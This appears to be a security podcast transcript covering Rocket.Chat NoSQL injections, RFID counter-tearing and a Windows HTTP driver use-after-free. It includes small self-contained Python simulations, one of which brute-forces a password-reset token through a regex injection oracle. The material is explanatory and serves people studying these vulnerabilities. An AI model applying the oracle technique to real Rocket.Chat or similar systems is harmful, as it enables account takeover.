start a Twitter mob, get the pitchforks out. We've definitely seen it before: bug fixed by mob. Yep, that should be an actual label. And they also called out that templating engines are so bad. Yeah, it doesn't surprise me. I don't really look at templating engines, and I haven't really seen much research around them. I don't know if that's just because they don't really get as much publicity, but it doesn't really surprise me, especially with how complex they have to be sometimes, with the features they want to provide. So, yeah, we'll move on to our next topic, which is two NoSQL injections in Rocket.Chat, detailed by SonarSource. The way they interact with each other is quite interesting. They state up front that each on its own could be used to hijack an admin account, though that is a little bit shaky on the first issue, but combining them can make for a more stealthy attack. So, we've covered Rocket.Chat quite a bit before on the podcast. In the beginning of the post, they talk about some background, mostly the fact that Rocket.Chat uses MongoDB for user data, which I think we've talked about before, and some issues around that,
I mean, there's nothing necessarily wrong with using MongoDB,
no. So I just wanted to call out that we've talked about Rocket.Chat's background a little bit
before. Yeah, Rocket.Chat are really good on HackerOne; they disclose a lot of their reports, and there is a report for this one also on HackerOne. They're really good; that's why we end up kind of bringing them up, because they do disclose their vulnerabilities and are very open
about it. Yeah,
but I will add, with MongoDB it just comes down to the fact that developers aren't necessarily thinking about the complex queries that you can do with MongoDB. That's where the vulnerabilities come in here: your ability to provide an object in place of just a standard string
query. Yep. So the first vulnerability is a blind NoSQL injection in the getPasswordPolicy method, which can be called on a user without being authenticated, but they do need to know the email for the account to attack, and that user can't have two-factor authentication enabled. The problem there is when they take the token from the user-provided parameters to that method: just like zi said, they take the parameter and pass it straight in. They don't make sure it's just a string; it could be an object. So what they abuse here is providing a regular expression, which allows you to effectively create an oracle and brute-force the reset token using that oracle. Now, abusing this issue to take over an account doesn't immediately give you elevated privileges. You could target an admin account with it, but it does create a lot of noise: a reset token is going to get sent to the user, they're going to get logged out, and they'll know something is wrong because their password has been reset, so they're not going to be able to log in anymore. So, because of the fact that it's so noisy against the user, and the fact that admins should have 2FA enabled, using this on its own is a bit shaky.
Same, exactly. And I'm sure there are a lot of admins who don't go and actually enable 2FA.
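The oracle trick described above can be simulated in a few lines of Python. This is a toy model of the bug class, not Rocket.Chat's actual code: a MongoDB-style lookup that accepts a raw object where a string was expected lets the attacker substitute a `$regex` operator, and the server's yes/no answer leaks the token one character at a time (`SECRET_TOKEN`, `find_user`, and the token format are made up for illustration):

```python
# Minimal simulation of a blind NoSQL-injection oracle: a Mongo-style
# query receives {"$regex": ...} instead of the literal reset token, and
# matching success leaks the token prefix.
import re

SECRET_TOKEN = "3fa9c1"  # hypothetical password-reset token in the DB

def find_user(token_query):
    """Mimics a Mongo lookup: string => equality, dict => operator query."""
    if isinstance(token_query, dict) and "$regex" in token_query:
        return re.match(token_query["$regex"], SECRET_TOKEN) is not None
    return token_query == SECRET_TOKEN

def brute_force(alphabet="0123456789abcdef", length=6):
    known = ""
    for _ in range(length):
        for c in alphabet:
            # The server's match / no-match response acts as the oracle.
            if find_user({"$regex": "^" + re.escape(known + c)}):
                known += c
                break
    return known

assert brute_force() == SECRET_TOKEN  # token recovered without knowing it
```

The defense is the one the hosts keep coming back to: validate that user-supplied parameters are plain strings before they ever reach the query.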
The HackerOne report is a bit more concise, but yeah, it's a good blog
post. Yeah, up next we have a Quarkslab blog post on RFID and monotonic counter tearing. This is an issue that I don't think we've ever really touched on before; it's kind of a unique issue in that respect.
It is a unique issue, and they did a great job explaining it, because it's not something I was really familiar with. I know you're a little bit more into the hardware stuff, but even you haven't really done much with
RFID, no. RFID is not really in anything that I've looked at; it's kind of been out of scope of what I'm interested in.
Yeah, it's one of those areas where there are definitely people interested in doing that research, but it's not something you necessarily end up following if you're just looking at hardware otherwise. So, they're talking about monotonic counters: counters that only go in one direction, you know, mono. In this case, they have these counters on board that are only supposed to go up. For anyone not familiar, RFID chips are low power, or rather they don't have power themselves; instead, the reading device powers the chip. So tearing, or a tearing event, is when you move the chip away from its power source. You can imagine the case where you've got a write going on and you move the card away from the power source, so that write gets interrupted. That's where the anti-tearing comes in, the idea being that you can't tear during the write and get the counter to go back down, or reset it to zero or something. So the attack that they're covering in this post ends up being basically about doing exactly that: taking this monotonic counter that should only go up, can only be incremented, and resetting it to zero, which I thought was a cool attack. This is actually their third blog post looking at different issues with tearing and different attacks that can be done there; the links are at the bottom of this post, so do check those out, as they cover a lot more detail in some of their past posts. Oh, and one other concept that matters to this attack is the idea of a weakly programmed bit. This can happen with the tearing: if you interrupt that write... it seems it's a little bit more complicated than just tearing during that particular bit's write, but the idea is that one of the
bits is being erased and then rewritten; the write will basically zero or one the bit and then actually replace it with the value, flipping all the bits necessary. So what can end up happening is you get this weakly programmed bit that sometimes, when it's being read, will be read as a one, and sometimes will be read as a zero. Usually, you know, however they're powering the bit, you want to get it above a certain threshold; if it lands right in the middle, it can be read either way, so you get a little bit of non-determinism. So the attack they end up having, like I said, was being able to reset the counter to zero, and the way they did that was by taking advantage of one of these weakly programmed bits, or a bit that could be weakly programmed. I should also mention the write process: they have this anti-tearing strategy, so you shouldn't be able to corrupt the counter. In that process, every counter is backed by two memory slots, and they won't both be written at once. Every memory slot also has a validity flag next to it, which just has a static value of 0xBD that gets written and rewritten every time. So, when you go to... I'd call it RFID glitching, I mean, kind of glitching, I don't know. When I think about glitching, I generally think of, like, power glitching, but I guess tearing could be seen as power glitching.
Yeah, I would file it under that.
I was going to say, I don't really think that is glitching, but I guess you're right. Anyway, the way they would do the anti-tearing is: they would check the validity flags. First, just to read the counter, they would look at both counter values and find the ones that have a valid flag; if both have a valid flag, it would take whichever one is higher. And then when writing to it, or incrementing it, they would read the value, of course, and whichever memory slot they got the value from, they would write to the other one. So if that write ends up being corrupted by tearing, the slot storing the old value will still be known good, and, you know, the counter still can't be decremented. Their attack, though, what they targeted: they would find one of these weakly programmed bits, where they can just keep trying to read it and notice the difference happening. They would set one of the counters to just a power of two, where the only bit set was this weakly programmable bit. So that counter slot would be all zeros except for one bit, and occasionally that bit might be read as a zero, instead of being set. So, if they were to tear during the writing of the other memory slot, tearing early so that the validity flag doesn't get written, then when it goes to read, it'll basically fall back on using the slot with the potentially zero-read bit. Trying that a few times, they can basically get it to reset to zero. They do a much better job of explaining it in the post, and they have a lot more background in their earlier posts, so if you're like me and don't really know much about this, the earlier posts were definitely a lot of help. But I thought it was a really cool attack.
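The two-slot scheme and the rollback can be sketched as a toy simulation. This is my own simplified model of the mechanism described above, not Quarkslab's exact chip internals; the slot layout, the weak-bit position (0x8), and the torn-write behavior are illustrative assumptions:

```python
# Toy model of the two-slot anti-tearing counter, and how a weakly
# programmed bit plus a torn write can roll the counter back to zero.

VALID = 0xBD  # static validity marker rewritten after each slot update

class Counter:
    def __init__(self):
        # Each slot holds [value, validity_flag].
        self.slots = [[0, VALID], [0, VALID]]

    def read(self, weak_bit_reads_zero=False):
        vals = []
        for value, flag in self.slots:
            if flag != VALID:          # torn write: slot is ignored
                continue
            if weak_bit_reads_zero:    # a marginal cell may read as 0
                value &= ~0x8          # drop the weakly programmed bit
            vals.append(value)
        return max(vals) if vals else 0

    def increment_torn(self):
        """Write the new value but tear before the validity flag lands."""
        cur = self.read()
        idx = 0 if self.slots[1][0] == cur else 1  # write the *other* slot
        self.slots[idx] = [cur + 1, 0x00]          # flag never written

ctr = Counter()
# Attacker steers both slots to a power of two whose only set bit is weak:
ctr.slots[0] = [0x8, VALID]
ctr.slots[1] = [0x8, VALID]
ctr.increment_torn()                   # torn update invalidates one slot
# The remaining valid slot holds only the weak bit; a marginal read sees 0:
assert ctr.read(weak_bit_reads_zero=True) == 0
```

Under normal conditions the scheme works as intended (a torn write just falls back to the old value); the rollback only appears when the surviving value consists entirely of a weakly programmed bit.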
Yeah, Quarkslab in general just does a really good job with these kinds of posts, and they're always interesting in that a lot of the posts I see from them are things that I just never really see talked about elsewhere. Like I said, this is an attack I hadn't seen; we've covered some whitepapers that touch on RFID, and I don't think this attack was mentioned in them. It's just something that you don't really think about; it's unique to how RFID is done. So yeah, I mean, it's a cool attack. It is a little bit over my head because it's not really my area, but I think it is a good write-up, and it's made as accessible to me as I think it could be.
So thank you, k9, for the
bit. Oh, thank you. Awesome, 69 bits, nice. Alright, so with that said, we'll move into our last topic, our last exploit topic of the podcast, which is from ZDI. This is a wormable bug, although I will have a question about that later, in Windows Internet Information Services, and where the bug is, is kind of interesting. The post is not that great, but again, I will get into that in a little bit. This is a service that's typically used on Windows servers for things like hosting HTML, ASP, PHP, whatever. And Windows has their HTTP stack implemented as a kernel-mode driver, which is probably not the greatest place to have that, but it's Windows, and it probably harkens back to legacy and wanting the best performance possible, not wanting to deal with context switches and whatnot. But if there's something you shouldn't have in kernel, it's probably something like this. So yeah, the post starts out giving some background on HTTP headers and how they're structured. I'm mostly going to skip that because that's relatively boring and well known.
If you're reading this, you probably already know a bit about how HTTP works. It almost feels like this is copy and pasted, like they are providing this to their clients. Well, the post is for vulnerability researchers to consume, but clearly some things are written with the idea that they're passing it to a client who maybe needs all the background.
Yeah, so the header that contains the vulnerability when it gets parsed is the Accept-Encoding header, for advertising the compression algorithms you want from the server, which then responds with the Content-Encoding header. So, for example, you can use gzip encoding, or identity, and you can also pass a weight parameter with those codings. You can either provide a valid and recognized coding, like gzip; a validly formatted but unrecognized one, like, I think, "aaaa" is one they give as an example, just anything that would be a valid string but isn't recognized; or you can pass a completely invalid one by using a semicolon or something inside the coding name. The problem comes into play when they go to parse the content codings: they keep a local doubly linked list to keep track of the nodes, and when it finishes building up that list, it gets copied into a request structure on the heap, but that local list never gets nulled out. So if you can trigger an error path, by abusing an invalid coding for example, that will free the entries of the local list, and on the next request it will free the pointers out from underneath that request object and cause a use-after-free. Now, I kind of got that explanation from talking to some others and looking at some proof of concepts, because the ZDI post here was extremely confusing to follow. They have like four paragraphs talking about how the doubly linked list is managed and whatnot, and maybe if you're familiar with the HTTP driver in Windows it makes sense to you, but when I was trying to model the state in my head while reading the post, I was going crazy. So there might be some better resources out there if you want to get a full picture of what the bug is. But yeah, it is a very cool bug, but it is a complex bug, so I can kind of understand why it was tough to explain.
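For listeners less familiar with the header being parsed here, this is a rough sketch of Accept-Encoding parsing following RFC 7231 semantics (codings separated by commas, optional `q=` weight after a semicolon). It's illustrative Python, not http.sys's actual kernel parser, and the validity check is a simplification of the token grammar:

```python
# Rough sketch of Accept-Encoding parsing: each comma-separated entry is a
# coding, optionally followed by ";q=<weight>". The three cases discussed
# are: recognized ('gzip'), well-formed but unknown ('aaaa'), and invalid.

def parse_accept_encoding(header):
    """Return (coding, qvalue, well_formed) triples."""
    out = []
    for item in header.split(","):
        parts = [p.strip() for p in item.split(";")]
        coding, q = parts[0], 1.0
        for param in parts[1:]:
            if param.startswith("q="):
                q = float(param[2:])
        # Simplified token check: non-empty, no whitespace or separators.
        # A failure here is the 'invalid coding' error-path case.
        well_formed = bool(coding) and not any(c in coding for c in " ;,")
        out.append((coding, q, well_formed))
    return out

print(parse_accept_encoding("gzip, aaaa;q=0.5"))
```

Here `gzip` is recognized, `aaaa` is well formed but unknown, and something like an empty name or a stray separator would fail validation, which is the kind of entry that steers http.sys onto the error path described above.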
And if what you said is true, where it might be something for a client who would recognize their own code better, it kind of makes sense the way it's for...
Not so much a client in that sense, because they do mention at the top that this is part of a report, not the entire report; it's an excerpt from a Trend Micro vulnerability research service report. So that's what I meant by "for a client", like Trend Micro writing it. And yeah, they provided the proof of concept.
Yeah, the proof of concept has a good description of the bug.
Yes, a very concise description of the bug; right there it basically explains where the bug happens. Oh, the only thing is... I'm sure this can be exploited, but I don't know. I mean, I feel like maybe I'm being too skeptical, because there have been all these claims about it being wormable, and I've seen a ton of posts touching on that. And, yeah, at least the example doesn't demonstrate it, but I suppose when they found it, they probably could have gone and taken it off to code
execution. Yeah, so all the PoCs that are out there, as well as the ZDI post, kind of stop at triggering a kernel bugcheck, which I guess is kind of reasonable. You don't want to be putting weaponized bugs out there if it is a wormable exploit, so I can kind of understand that angle.
That's where I feel like I'm just being overly... we're overly cynical. Yeah. I mean, I'm sure it's exploitable; this is basically a perfect setup, you've got the dangling pointers in the request structure. I'm sure it's exploitable, so I probably shouldn't have even mentioned any concern about the claim that it's wormable. It's just...
Yeah. So I did kind of want to talk about the "wormable" term usage, mainly just because it's funny that the ZDI post has that in the title... you know, they want to get the attention of having "wormable" in the title, but they never mention it again. They don't talk about how it could be wormed or whatever. Which, again, I can kind of see, because you don't want to empower skids, but it was just a bit odd to me. But yeah,
I mean, I think it wasn't just ZDI; I've definitely seen other mentions of it. I don't know exactly where the source was; it might have even been out of, like, Patch Tuesday or something, or whoever did the analysis. Either way, it likely is wormable, so there's no reason really for me to doubt
that. Yeah, so it did come out of Patch Tuesday; I was going to touch on that a little bit. The bug was found internally, which is good; it wasn't found being used in the wild or anything. It was found by a couple of researchers, and one of them is somebody I talk to a little bit on IRC, so it was cool to be able to talk to him about it. I sent him the ZDI post, and the way I read the ZDI post, the way it was formatted, it almost seemed to me like a brain dump. Like, if you found an issue, let's say you fuzzed... I think this issue was found through fuzzing... if you fuzzed and found a crash, and you were trying to do some root cause analysis, this is the way I would write if I was trying to do a brain dump and just figure out what was going on. And I said that when I sent over the link to the ZDI post, and he was like: yeah, that's exactly what it was like when I first found it; it was hard to work through the state. The only thing with the ZDI post, I think what would have made it, like, a hundred times better, was if they had a diagram, just a diagram showing the state of what was happening, how the linked list was being managed, and how that tied into the UAF. But instead it was just paragraphs of stuff. But yeah, this is a pretty cool bug, and once again, it's good that it was found internally. I just wanted to call that out before we move into our shoutouts. So yeah, we will move into our shoutouts now. Zi, I'll let you take it away, because we've got a Project Zero one which I wanted to get read, but I just didn't have enough time on the weekend.
Yeah. Well, "Fuzzing iOS code on macOS at native speed."
Yeah, I wasn't sure how much you read into it.
I've read over it... like, I've read parts of it, I haven't gone through the entire thing. It's not that long; I mean, it's got a good scroll to it, but there are, you know, code segments and stuff, and I've seen some of the discussion around it. So I at least want to call it out for you guys to check out: it's basically, you know, getting iOS code to run on macOS, as it says, and getting to the point of doing native-speed fuzzing with it. The other shoutout that I've got is a keynote. Now, this is older: "Weird Machines, Exploitability, and Provable Non-Exploitability," from Thomas Dullien, I'm not sure if I'm saying that correctly. I've talked, especially because of my recent exploit development video, about the concept of weird machines as being kind of an important concept to understand and grasp, and kind of one of the tougher things to grasp. In this keynote... I think he also wrote the paper by pretty much the same name; I've read the paper, but the keynote here is 40 minutes long, so it's not like a normal conference-paper-type presentation. I thought he just did a really good job of explaining it. At first it's really dry, but towards the middle, when he starts talking about, you know, what exploitation is, and doing the definitions, it had one of the most concise definitions I think I've ever heard. So I wanted to shout this out even though it is several years old at this
point. Yeah, it had a really good diagram when he was trying to explain how weird machines work; I thought that diagram was a really solid way of demonstrating what's going on. I didn't watch the full talk, I just watched a few minutes of it, the part that you linked to. But yeah, the slides look good from what I was looking at, and obviously it's coming out of Project Zero; at this point, pretty much anything coming out of Project Zero you can expect to be good, so
yeah, I don't think he's... I'm not sure if he's still at Project Zero; I feel like he left a little bit after this, actually. But yeah, I mean, I don't know if
he's still at Project Zero, but anything, even in the past, anything that's really come out of them in the last five years or whatever... I mean, they were established in, like, 2014. But all the way through, they've been really solid with what they put out. So
Yeah, so I wanted to call this out, like I said, especially in conjunction with our series on going from CTF-style binaries to more real-world exploit dev. This is kind of the key concept that I think you need to understand to start approaching modern exploits. Whether or not you follow all of it... he goes into the formal explanations and everything... whether or not you follow that, just understanding the concept matters. Don't get the idea that you need to watch this and get everything; he goes into a lot more of the formal logic
also. Yeah, someone in chat also called it out: so he went on to start his own company. Okay, cool, that clarifies that a little bit, with what you were bringing up. We do have another shoutout as well, which is a browser fuzzing post by Mozilla. It's not super novel if you've already looked into the fuzzing space and browsers, like looked at conference talks or just played around with it; there's nothing super new there. But it does give a nice overview of how browser fuzzing is set up, and the fuzzing pipeline, at least when it comes to Firefox: talking about what kinds of sanitizers and debug builds they use for the fuzzing targets, some of the automated triaging they do with FuzzManager, as well as their own tool called Bugmon, which I don't think I'd really seen before. I did a little bit of looking into it when I saw this post. But yeah, just a really solid overview of how a fuzzing pipeline works in a modern, monolithic target.
They kind of pitch fuzzing as more of a development-side tool rather than just a security thing. Well, I mean, it is for security issues, but...
It's like an insider
perspective. Yeah, I thought it was really cool actually seeing this detail out of Mozilla, just seeing what they're doing on that and their whole
pipeline. Yeah, it's a really good post; even though it doesn't have anything earth-shattering in it, it's just a really good overview. But with that said, that's all of our topics for this week. Thank you to everyone who tuned in. VODs will be up on Twitch, Spotify, YouTube, and other platforms on Anchor 24 hours after the podcast. Again, this is the last episode before the break; that doesn't mean Day Zero will be going inactive or anything, it's just the podcast will be on break. We'll still be in Discord, and potentially doing streams and other video releases, so keep an eye out for that. Also, plugging once more that our mini-series on going from CTF to real-world vuln research and exploitation is out, and might be of interest to some of you out there. I'm also going to be putting out that VOD of the stream zi and I did where we looked at the new IDA Free release, which includes their cloud decompiler. Again, we didn't really cover the IDA Free release on the podcast, but we took a look at it in the stream, and you can check out that video to see our thoughts on it. The tl;dr: they were positive. The cloud decompiler seems to be pretty good, and it's awesome that there's a free option now other than just Ghidra for decompilation... I should say, decompilation that doesn't suck.
One of the few times that we have been talking positively about IDA.